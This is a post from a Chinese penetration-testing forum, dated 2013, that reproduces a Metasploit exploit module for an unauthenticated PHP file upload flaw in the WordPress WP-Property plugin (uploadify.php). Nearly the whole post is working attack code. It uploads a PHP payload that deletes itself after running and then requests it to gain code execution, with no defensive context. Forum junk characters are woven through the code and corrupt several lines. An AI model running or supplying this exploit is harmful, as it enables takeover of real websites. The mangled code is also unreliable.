中国网络渗透测试联盟

标题: WordPress WP-Property PHP 文件上传漏洞 [打印本页]
作者: admin    时间: 2013-1-4 19:51
标题: WordPress WP-Property PHP 文件上传漏洞
WordPress WP-Property PHP 文件上传漏洞& ~$ X4 r' l9 R2 }1 v  d& x# {5 `4 k

) F; J- q  [  m  T: ]9 { ## # This file is part of the Metasploit Framework and may be subject to, P+ G& C6 E" {9 P, J9 w

+ O4 P6 z5 l2 C# redistribution and commercial restrictions. Please see the Metasploit/ B' A$ @1 C' P/ O* o, n

  e- F8 u0 k" ^% l% D2 J1 g# Framework web site for more information on licensing and terms of use.4 c8 n4 e8 J% o) F! ?' [

. M! G! X9 q9 o8 l#   http://metasploit.com/framework/ ##
9 {& u3 c9 }, r" U% r$ f* j6 ?* Q$ H. s5 }8 @

/ y. f  ~$ d3 V/ X, v/ |& l
- Y8 N( R0 X. s6 }   g0 ^) ^, d. m, m$ L; Z: c7 {

4 w: ?3 O& A$ u7 E/ _require 'msf/core'
8 t) O, }3 a$ a/ o: x. p. ?require 'msf/core/exploit/php_exe'1 X- J" e" t4 g2 t
# U2 T) b* Z8 \' Z
class Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',- f% a0 {( V2 q* T
'Description'    => %q{' a# M5 D# F& U' ]9 P
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>
1 v' _8 O8 h! S+ v8 C' L. z/ X+ M) o[: x5 R4 }- o: L7 J8 g$ y
'Sammy FORGIT', # initial discovery
6 \. _% m" G( j  N& r9 k: J( H'James Fitts <fitts.james[at]gmail.com>' # metasploit module
4 M% N3 C5 V: r# I],
% y# q7 L% v, a$ `8 U/ Q'License'        => MSF_LICENSE,
- V9 n0 x2 f1 {5 z+ I'References'     =>7 Y2 C, \1 @5 ~. b' C
[( `1 g( D, a& {7 F1 @* W* A6 x
[ 'OSVDB', '82656' ],7 I$ O. n0 _$ ?8 f" J/ \3 R* C* }, }
[ 'BID', '53787' ],
2 |- j7 k+ u& E" b[ 'EDB', '18987'],
( `9 E! E2 S# j: e& u# j[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
+ y$ |( w+ x  M- y],6 K. I( i' F: N8 G8 [
'Payload'        =>0 p- k& U: R: M9 u# G
{
6 M4 o& {5 U6 A; {: ~'BadChars' => "\x00",$ X3 H* b$ `) Y1 v# a1 m' {3 W
},
  a8 y9 ]% T; L/ ?/ r4 q'Platform'       => 'php',
! ~" T* E1 u9 ]'Arch'           => ARCH_PHP,
$ `- ]! N6 \& d( O'Targets'        =>9 t0 {2 a* t- k( D4 t" P
[/ R  M1 M2 O8 V+ D) y
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
3 \. G( ?" ~6 W[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]# G/ p9 n( F( y, ^! a2 C( M* o
],: {, K  O' J9 |7 E, U2 C# ^
'DefaultTarget'  => 0,
/ K2 y' B1 j4 r$ D9 {: @* R'DisclosureDate' => 'Mar 26 2012'))
# k. U& B5 Y& S  Q( C3 j4 w- ?& L/ V
register_options(
: B! L+ @- I6 z+ i" N) W[% e) Y6 D5 [7 K7 u, H! [2 C
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
1 C* c& A& N- J" {], self.class)
& J/ {$ I# Q1 _  t) v( }end; X$ x; W5 l! q' E' X3 o
$ t0 z3 A$ l9 J, @
def check' o* v. H5 K  c, I: @9 ]
uri =  target_uri.path9 m: T- o: J9 ^& w: h
uri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',
) E. q6 B# W, I'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
6 W: y5 W* y/ C$ v, y5 g0 n: b: A})- n) u" J. }, B, ^  S# [
2 W& T, Q4 j' b; {' S( ^
if not res or res.code != 2008 ]  Q  n9 i' O" k
return Exploit::CheckCode::Unknown
6 o% a; G$ F9 s2 bend
5 Q. `9 ?+ n" e  ]0 |& r/ {% Q$ S& o/ s. B- n4 I# s: t
return Exploit::CheckCode::Appears% q: f0 K, D+ J. [1 f$ g3 ?; ^
end* S- ^+ T- D3 N$ T4 i& L

5 @0 ?/ F; Y1 C- v  F6 Kdef exploit
- q* \7 `9 \. |( W" @uri =  target_uri.path
$ q) N) E" j% [+ o& s# Q) Guri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)
( E5 p2 z+ O2 E; t) D, i
" y+ v  j5 \# i( e- h  ^data = Rex::MIME::Message.new
5 h0 D5 ]( B( f' L# ^4 fdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")% z! Y2 y. ^+ b  }
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")8 O& X. o$ }' _% t
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_'): ]: E5 n3 t, V% G

* ]  J$ {: S3 W! ~5 Xprint_status("#{peer} - Uploading payload #{@payload_name}")
0 O* z9 N( H' y& b- }res = send_request_cgi({* [+ N% Z; P) o# e6 t# X  Z
'method' => 'POST',
) [6 p. v" V9 R: m4 P* H'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
; M, Q: F" @0 {2 c/ G'ctype'  => "multipart/form-data; boundary=#{data.bound}",
9 _2 S$ W3 }$ W" K' D1 `( X5 G: @'data'   => post_data
6 X# ?* V* g. B9 t/ d})
, ^; H* ?# V' ]& G  \1 s3 Y- c7 Z
if not res or res.code != 200 or res.body !~ /#{@payload_name}/& h8 M, K! r' I) W$ K  A1 c# `
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
, L, t( Q) ]- J6 h3 F6 `( G' Yend
7 b0 Z4 H4 \; y
6 n# e( q1 Z0 W* _upload_uri = res.body
$ V0 ?# B, C0 t
' K& t7 W; V9 N( D2 x, t- ~print_status("#{peer} - Executing payload #{@payload_name}")5 N( }4 m( p+ b$ _
res = send_request_raw({
2 \" r; h, V2 E; }4 o'uri'    => upload_uri,
9 j( g0 ^9 B  l) @, Z) d/ N# F'method' => 'GET'
7 P* Q1 |+ ^0 A, S3 H})8 B' ^1 f# y; g1 B! ?8 Y
end
" k+ {: G$ ~- s3 Q" _1 P4 hend
% Q' a6 _. ~* X- |, Z
2 k* [8 G9 J8 E不要问我这写的是什么 怎么利用 我是说msf.
+ ~% F3 A$ ^& _
$ Q% \! s* t/ t' G# P% f



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2